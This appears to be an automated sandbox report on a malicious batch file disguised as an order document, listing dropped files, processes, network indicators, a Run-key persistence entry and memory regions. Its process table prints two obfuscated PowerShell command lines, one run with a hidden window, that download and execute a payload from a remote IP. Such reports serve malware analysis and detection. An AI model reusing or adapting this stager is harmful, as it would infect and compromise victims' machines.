Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Ordine_doc_419024001904.bat
|
ASCII text, with very long lines (2865), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu3bio23.1v3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsfzwus5.lv0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwgajo4p.34g.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyuf5eoi.3xc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\s5497I81
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x36, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DN32P3HNCG519VXTW9UR.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Specificerings.Lit
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ordine_doc_419024001904.bat" "
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1;
$Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function
Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL
N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising
',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising
'.>. ';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn
ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG
rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l
i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO
b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [
$SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i
l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende
(Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer)
{Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising
'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl
ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl
i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu
sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=,
[AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising
'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr
s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3
0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function
Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende,
$Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l
l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1.
CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t
tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. ';$Sammenkrbet=Orthographising
'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo,
J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende
(Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S
');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe
m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n
7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe
dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb
a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg
lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo
A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende
(Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn
t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG
e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH.
COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl
:,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende
(Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4.,
2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"
|
||
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
|
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
|
||
C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe
|
"C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe"
|
||
C:\Windows\SysWOW64\AtBroker.exe
|
"C:\Windows\SysWOW64\AtBroker.exe"
|
||
C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe
|
"C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe"
|
||
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
|
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
|
||
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
|
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
|
||
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
There are 15 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.oyoing.com/gnbc/
|
91.195.240.19
|
||
http://www.tyaer.com/gnbc/?5b=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==&wD=mjvh1V4x
|
47.91.88.207
|
||
http://87.121.Hr
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://87.121.105.163/Skabs.asd
|
87.121.105.163
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://87.121.105.163/~
|
unknown
|
||
http://87.121.105.163
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://87.121.105.163/Skabs.asdXRsl0
|
unknown
|
||
http://87.121.105.163/
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://87.121.105.163/icjFpYDkBweqyeZ252.binT
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://87.121.105.163/icjFpYDkBweqyeZ252.binM
|
unknown
|
||
http://87.121.105.163/icjFpYDkBweqyeZ252.bin
|
87.121.105.163
|
||
http://87.121.105.163/icjFpYDkBweqyeZ252.binRAw
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://87.121.105.163/Skabs.asdP
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
www.tyaer.com
|
47.91.88.207
|
||
www.oyoing.com
|
unknown
|
||
parkingpage.namecheap.com
|
91.195.240.19
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
47.91.88.207
|
www.tyaer.com
|
United States
|
||
87.121.105.163
|
unknown
|
Bulgaria
|
||
91.195.240.19
|
parkingpage.namecheap.com
|
Germany
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
VT_DR8YHH6
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
23890000
|
unclassified section
|
page execute and read and write
|
||
1681C8C1000
|
trusted library allocation
|
page read and write
|
||
BF7B000
|
direct allocation
|
page execute and read and write
|
||
1030000
|
system
|
page execute and read and write
|
||
28A0000
|
trusted library allocation
|
page read and write
|
||
22C0000
|
unkown
|
page execute and read and write
|
||
2860000
|
trusted library allocation
|
page read and write
|
||
3A0000
|
system
|
page execute and read and write
|
||
8470000
|
direct allocation
|
page execute and read and write
|
||
5982000
|
trusted library allocation
|
page read and write
|
||
140000
|
unclassified section
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
73C0000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
DAC000
|
stack
|
page read and write
|
||
92F0000
|
direct allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4DC4000
|
trusted library allocation
|
page read and write
|
||
C40000
|
unkown
|
page readonly
|
||
78C7000
|
heap
|
page read and write
|
||
2A65000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
16824850000
|
heap
|
page read and write
|
||
140000
|
direct allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
1680A855000
|
heap
|
page read and write
|
||
78BE000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
8FE000
|
stack
|
page read and write
|
||
7E67000
|
stack
|
page read and write
|
||
81DB000
|
heap
|
page read and write
|
||
1DF03DCB000
|
heap
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
7851000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7214000
|
heap
|
page read and write
|
||
1680A751000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680A70C000
|
heap
|
page read and write
|
||
977B000
|
direct allocation
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
2A3E000
|
unkown
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
23C0F5D0000
|
heap
|
page read and write
|
||
16824A17000
|
heap
|
page execute and read and write
|
||
7150000
|
heap
|
page read and write
|
||
7192000
|
heap
|
page read and write
|
||
C8E000
|
unkown
|
page readonly
|
||
737D000
|
stack
|
page read and write
|
||
8450000
|
trusted library allocation
|
page read and write
|
||
5F8000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
7FF0000
|
trusted library allocation
|
page execute and read and write
|
||
1F0000
|
unkown
|
page readonly
|
||
2AB0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7EAF000
|
stack
|
page read and write
|
||
1680A702000
|
heap
|
page read and write
|
||
29F0000
|
heap
|
page read and write
|
||
7890000
|
heap
|
page read and write
|
||
71B5000
|
heap
|
page read and write
|
||
9360000
|
direct allocation
|
page read and write
|
||
2AC0000
|
trusted library allocation
|
page read and write
|
||
8211000
|
heap
|
page read and write
|
||
410000
|
unkown
|
page read and write
|
||
5004000
|
unclassified section
|
page read and write
|
||
669B000
|
remote allocation
|
page execute and read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
7E2F000
|
stack
|
page read and write
|
||
7EFE000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
16824AF0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2B6F000
|
heap
|
page read and write
|
||
46D1000
|
trusted library allocation
|
page read and write
|
||
1680C6F4000
|
heap
|
page read and write
|
||
718F000
|
heap
|
page read and write
|
||
21C0000
|
unkown
|
page readonly
|
||
2D10000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
23C0F4C0000
|
heap
|
page read and write
|
||
6D6F000
|
heap
|
page read and write
|
||
88D000
|
stack
|
page read and write
|
||
472E000
|
stack
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
23C10F14000
|
trusted library allocation
|
page read and write
|
||
1680A7A0000
|
trusted library allocation
|
page read and write
|
||
78C6000
|
heap
|
page read and write
|
||
2930000
|
remote allocation
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
C97000
|
unkown
|
page readonly
|
||
3F4000
|
heap
|
page read and write
|
||
2A5A000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
23C0F4DC000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
1680E4A1000
|
trusted library allocation
|
page read and write
|
||
2DE2000
|
heap
|
page read and write
|
||
65C000
|
heap
|
page read and write
|
||
652000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
1680E4BB000
|
trusted library allocation
|
page read and write
|
||
B2612FF000
|
stack
|
page read and write
|
||
2AD3000
|
heap
|
page read and write
|
||
6B40000
|
direct allocation
|
page read and write
|
||
2AD3000
|
trusted library allocation
|
page execute and read and write
|
||
7A7000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4530000
|
trusted library allocation
|
page read and write
|
||
9310000
|
direct allocation
|
page read and write
|
||
2CC0000
|
heap
|
page read and write
|
||
1680A70E000
|
heap
|
page read and write
|
||
2380D000
|
direct allocation
|
page execute and read and write
|
||
7250000
|
trusted library allocation
|
page read and write
|
||
F9D4000
|
system
|
page read and write
|
||
1680C8DB000
|
trusted library allocation
|
page read and write
|
||
78D1000
|
heap
|
page read and write
|
||
53C000
|
stack
|
page read and write
|
||
7400000
|
trusted library allocation
|
page read and write
|
||
2301E000
|
stack
|
page read and write
|
||
760000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
2CD2000
|
unkown
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
788A000
|
heap
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
30000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
B57B000
|
direct allocation
|
page execute and read and write
|
||
478E000
|
direct allocation
|
page execute and read and write
|
||
70D0000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
9EA000
|
stack
|
page read and write
|
||
458E000
|
stack
|
page read and write
|
||
480B000
|
unkown
|
page execute and read and write
|
||
23C10E00000
|
trusted library allocation
|
page read and write
|
||
465E000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
812C000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
8E5000
|
heap
|
page read and write
|
||
78B4000
|
heap
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
C97000
|
unkown
|
page readonly
|
||
1680A7D0000
|
trusted library allocation
|
page read and write
|
||
C30000
|
unkown
|
page readonly
|
||
2A5ED7F000
|
stack
|
page read and write
|
||
2DBD000
|
heap
|
page read and write
|
||
8215000
|
heap
|
page read and write
|
||
3394000
|
unkown
|
page read and write
|
||
9A000
|
stack
|
page read and write
|
||
1680CD1C000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
661000
|
heap
|
page read and write
|
||
1680E68B000
|
trusted library allocation
|
page read and write
|
||
23882000
|
direct allocation
|
page execute and read and write
|
||
2DC1000
|
heap
|
page read and write
|
||
1680A850000
|
heap
|
page read and write
|
||
F5EC000
|
system
|
page read and write
|
||
528000
|
heap
|
page read and write
|
||
709B000
|
remote allocation
|
page execute and read and write
|
||
2840000
|
heap
|
page read and write
|
||
2A5ECFF000
|
stack
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
2AC9000
|
heap
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
7880000
|
heap
|
page read and write
|
||
83E000
|
stack
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
7390000
|
trusted library allocation
|
page read and write
|
||
61D000
|
heap
|
page read and write
|
||
C97B000
|
direct allocation
|
page execute and read and write
|
||
2305F000
|
stack
|
page read and write
|
||
16824A20000
|
heap
|
page read and write
|
||
2DCF000
|
stack
|
page read and write
|
||
6D60000
|
heap
|
page read and write
|
||
421000
|
unkown
|
page readonly
|
||
1130000
|
unkown
|
page readonly
|
||
7410000
|
trusted library allocation
|
page read and write
|
||
1DF040E4000
|
heap
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
E10000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
2CC0000
|
heap
|
page read and write
|
||
2B87000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
23C110C4000
|
trusted library allocation
|
page read and write
|
||
78CC000
|
heap
|
page read and write
|
||
2BF0000
|
trusted library allocation
|
page read and write
|
||
275F0000
|
direct allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
F20000
|
unkown
|
page read and write
|
||
529B000
|
remote allocation
|
page execute and read and write
|
||
1680A5F0000
|
heap
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
2D80000
|
heap
|
page read and write
|
||
78BE000
|
heap
|
page read and write
|
||
1680A706000
|
heap
|
page read and write
|
||
785E000
|
heap
|
page read and write
|
||
2A6F000
|
heap
|
page read and write
|
||
6BD5000
|
heap
|
page execute and read and write
|
||
6D88000
|
heap
|
page read and write
|
||
1680DA44000
|
trusted library allocation
|
page read and write
|
||
10FB000
|
system
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
970000
|
unkown
|
page readonly
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
C20000
|
unkown
|
page readonly
|
||
DD7B000
|
direct allocation
|
page execute and read and write
|
||
2DAA000
|
heap
|
page read and write
|
||
4569000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
489F000
|
stack
|
page read and write
|
||
16824A3A000
|
heap
|
page read and write
|
||
80EC000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
6B30000
|
direct allocation
|
page read and write
|
||
23390000
|
heap
|
page read and write
|
||
23C10DC0000
|
heap
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
785B000
|
heap
|
page read and write
|
||
1680A660000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
510000
|
unkown
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
30000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
231E1000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page execute and read and write
|
||
253DB000
|
unclassified section
|
page execute and read and write
|
||
C80000
|
unkown
|
page readonly
|
||
C20000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
1130000
|
unkown
|
page readonly
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
4565000
|
heap
|
page read and write
|
||
78CC000
|
heap
|
page read and write
|
||
78BA000
|
heap
|
page read and write
|
||
6AB0000
|
direct allocation
|
page read and write
|
||
1088000
|
system
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
C60000
|
unkown
|
page read and write
|
||
73E0000
|
trusted library allocation
|
page read and write
|
||
2AC9000
|
heap
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
22F5D000
|
stack
|
page read and write
|
||
296C000
|
stack
|
page read and write
|
||
6B10000
|
direct allocation
|
page read and write
|
||
33B000
|
stack
|
page read and write
|
||
420000
|
heap
|
page read and write
|
||
1680C000000
|
trusted library allocation
|
page read and write
|
||
1680C6A5000
|
heap
|
page read and write
|
||
2AD0000
|
trusted library allocation
|
page read and write
|
||
4380000
|
trusted library allocation
|
page read and write
|
||
469E000
|
stack
|
page read and write
|
||
2950000
|
heap
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
1680C840000
|
heap
|
page execute and read and write
|
||
10000
|
unkown
|
page readonly
|
||
